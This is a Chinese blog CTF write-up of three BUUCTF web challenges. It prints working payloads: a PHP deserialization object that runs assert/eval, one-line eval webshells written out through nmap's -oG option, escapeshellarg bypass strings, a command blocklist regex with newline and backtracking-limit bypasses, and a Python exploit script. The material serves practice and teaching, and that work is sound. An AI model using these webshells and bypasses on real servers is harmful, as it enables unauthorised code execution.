buu(rce命令执行)

最新推荐文章于 2023-07-14 11:47:03 发布
最新推荐文章于 2023-07-14 11:47:03 发布
阅读量354 收藏
点赞数 1
文章标签: php servlet 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/126365601
版权

目录

[NPUCTF2020]ReadlezPHP

[网鼎杯 2020 朱雀组]Nmap

[FBCTF2019]RCEService

[NPUCTF2020]ReadlezPHP

查看源代码发现一个目录,然后访问一下

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

 $b($a)看见这个以前肯定做过需要用指定的函数,翻看一下以前的文章复习一下

反谢列话,先尝试一下,system(phpinfo())


<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "system";
    }
}
$c = new HelloPhp;
echo urlencode(serialize($c));
?>

发现还是时间没变化,考虑到system是不是被过滤掉了,用assert试一下

看到环境,果然被过滤了

在里面发现flag,或者通过一句话木马

 public $a = 'eval($_POST[hack]);'; public $b = "assert";

然后通过hack可以链接议建,或者自己构造另一种思路

eval类型函数是代码执行而不是命令执行(一句话木马)

system类型函数是命令执行而不是代码执行

assert和eval类似,是代码执行  assert后面不需要;

[网鼎杯 2020 朱雀组]Nmap

这道题其实不算是命令执行,主要考察Nmap这个工具,但是也用到了一点就归到这类吧

 写这道题之前需要用到,这些知识

nmap其他写文件命令:

-oN (标准输出)

-oX (XML输出)

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep输出)

-oA (输出至所有格式)

这道题和我做过的题基本一模一样,buuctf(探险2)_偶尔躲躲乌云334的博客-CSDN博客

[BUUCTF 2018]Online Tool

打开界面,

 127.0.0.1 <?php @eval();?> -oG hack.php        -oG是直接写入

我们先来试一下

说明有过滤的字符,我们依次筛选,发现是php这样就只能使用短标签代替了

127.0.0.1 <?= @eval($_POST[1]);?> -oG h.php  忘记了php被过滤,后缀也一样,用phtml代替127.0.0.1 <?= @eval($_POST[1]);?> -oG h.phtml

显示了上传,可是没有找到这个文件

 其实看到这里我们就能想起来,escapeshellargescapeshellcmd的过滤,这是当成了一整个字符处理,所以不行我们要绕过

只需要两边加'和空格就可以绕过,并且可以省略127.0.0.1 

' <?= @eval($_GET[1]);?> -oG p.phtml ' 这里用get传参更加明显

成功看一下,环境

获得flag 

[FBCTF2019]RCEService

打开界面发现需要用json的方式输入命令,百度一下

{ "name":"兮动人", "age":22, "fruits":["apple","pear","grape"] } 

这种也就是前面是属性,后面是值,用大括号包起来

我们尝试一下 ,这个文本框是cmd

{"cmd":";ls /"}

黑客的企图被发现了,我想到可能有某种过滤,或者正则,可是没有源码,无从下手

偷偷跑过去翻隔壁的wp,拿回来了源码

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

 发现真的过滤了好多

但是他用的是preg_match()函数,只匹配一行,用个换行符搞定

{%0A"cmd":"ls /"%0A}

?cmd={%0A"cmd": "ls /"%0A},如果在文本框输入还需要进行一次url编码,直接在url中写入

没有发现flag

putenv('PATH=/home/rceservice/jail');// 设置了环境变量,只能使用当前环境的命令

改变了当前路径,猜测flag就在这个路径之中

 cmd={%0A"cmd": "ls /home/rceservice/jail"%0A},果然flag在里面直接cat

 那如何调用cat呢,简单,直接用绝对路径调用
?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

方法二

使用脚本回溯次数超出了限制,让正则失效:

回溯就是通过请求次数>1000000然后返回flase,如果想防御这个漏洞,可以用强比较

flase===0  false

flase==0  true 

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

import requests
url="http://bf25a98f-152e-4770-a4b5-6dfe0d4aab20.node4.buuoj.cn:81/"
payload='{"cmd":"ls /","test":"' + "a"*(1000000) + '"}'
res=requests.post("http://bf25a98f-152e-4770-a4b5-6dfe0d4aab20.node4.buuoj.cn:81/",data={"cmd":payload})
print(payload)
print (res.text)

然后把payload改为

payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'

获得flag

偶尔躲躲乌云334
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[buuoj][GXYCTF2019]Ping Ping Ping
qq_42250840的博客
07-07 341
知识点: linux的命令执行 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞 绕过空格、敏感字符、连接符 复现: 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤, 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
BUU 命令执行漏洞-[ACTF2020 新生赛]Exec
Ivyyyyyy1的博客
10-17 2541
一、题目 点开页面,经典的命令执行表单 先输入几个玩玩 都是正常回显,没啥怪东西 二、解题 1. 这里会用到 管道符 有关的知识点 ① | : 即按位或,会直接执行管道符之后的语句 ② || : 即逻辑或,若管道符前语句为true则只执行前一句,否则只执行后一句 ③ & : 即按位与,会直接执行前后两个语句 ④ && : 即逻辑与,若管道符前语句为true则执行两个语句,反之都不执行 2.在Linux命令中,ls 用于列出目录条目 那...
BUU 命令执行-[GXYCTF2019]Ping Ping Ping
Ivyyyyyy1的博客
11-07 210
一、题目 总有些题喜欢打着ping的名义,做着命令执行的事 我们便先ping一ping罢 没什么异常 这里根据经验,猜测是用到了shell_exec()、exec()等等这种函数 二、解题 我们在ip的参数值里面加入管道符 | ,即把 | 之前的命令输出结果作为 | 之后的命令参数 而 ls 不存在参数,所以不会被影响 这样我们查到了flag文件就在目录下 直接cat出来 这里根据返回的结果来看,后台应该是把空格过滤了 查了一下知乎上面绕过空格过滤的方法 ...
buu-ThinkPHP-rce
lalalalafan的博客
11-15 2841
buu-ThinkPHP5-rce1】 1.传参,查找flag即可 s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 【buu-ThinkPHP2-rce】 index.php/Index/index/name${@phpinfo()} 【buu-ThinkPHP5.0.23-rce】 1. 执行命令poc POST /index
BUUCTF 之 命令执行知识点总结
qq_49833809的博客
11-13 268
命令执行知识点总结
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUU系列
qq_49422880的博客
07-20 332
[NCTF2019]True XML cookbook   打开页面是一个登录页面,那攻击的方式就很多了,但是根据题目所给的提示,与XML相关,所以估计不是注入或者弱口令之类的,发现源代码的下面有一些代码,进行一下代码审计。 function doLogin(){ //登录函数 var username = $("#username").val(); //获取变量的值 var password = $("#password").val(); if(username == "" || passwo
BUU php代码审计-[极客大挑战 2019]Havefun
Ivyyyyyy1的博客
10-15 1152
一、题目 是一只尾巴会摇的猫猫! 查看源代码: 发现注释信息的hint 二、解题 提示信息的代码段如下: <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 意思是让我们用GET方式提交一个名为cat的变量,当$cat='dog'时...
BUU实战笔记——简单的PHP弱类型
qq_51175992的博客
07-14 118
审计代码抓住md5和PHP弱类型的特征
buuctf-PHP
xixihahawuwu的博客
11-23 1207
看题目说备份网站,扫一下看看 把文件下载下来 一些源码 这里的unserialize涉及到一个反序列化 接着看class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ .
BUUCTF-web PHP[极客大挑战] wp
想喝奶茶的胖大海
02-26 1024
检查 有一只超级可爱的猫猫哦,可以跟你玩毛球球 然后提示说有备份,可以扫一下 思路 跟进得到压缩包,解压得到3个文件 在index.php得到关键代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 由unserialize(...
buu题解
m0_73393932的博客
12-14 267
逆向
2022安洵杯babyphp
东隅的博客
11-28 1046
这个题没打出来有点可惜,感觉做的都差不多了,不过有些地方确实没理解,还是理解不到位先来看序列化,这个序列化是不难的,不过有一个小坑,我们先理一遍顺序flag.php这里最后肯定要调用C类的uwant函数,可以由A类的__invoke()方法触发,A类的__invoke()方法由C类的__toString()方法触发,这里有一个小坑,我当时一直以为这个tostring是A类的 $this->a = "babyhacker";触发的,结果一直没跑通,后来看没用到B类,尝试用B的die($this->a);
php的控制反转和依赖注入
sinat_38804294的博客
07-04 433
1.判断代码的好处就是高内聚低耦合 高内聚就是软件模块是由相关性很强的代码组成,只负责一项任务,也就是常说的单一责任原则。 低耦合就是每个模块之间耦合度要低,如果要修改,修改一点点就可以而不是修改一大部分。 而在代码中体现出来的设计模式就是依赖注入和控制反转 2.依赖注入: 就是A类所依赖的B类C类等以属性或者构造函数等方式注入A类而不是直接在A类中实例化。 例如: class A { p...
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 616
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值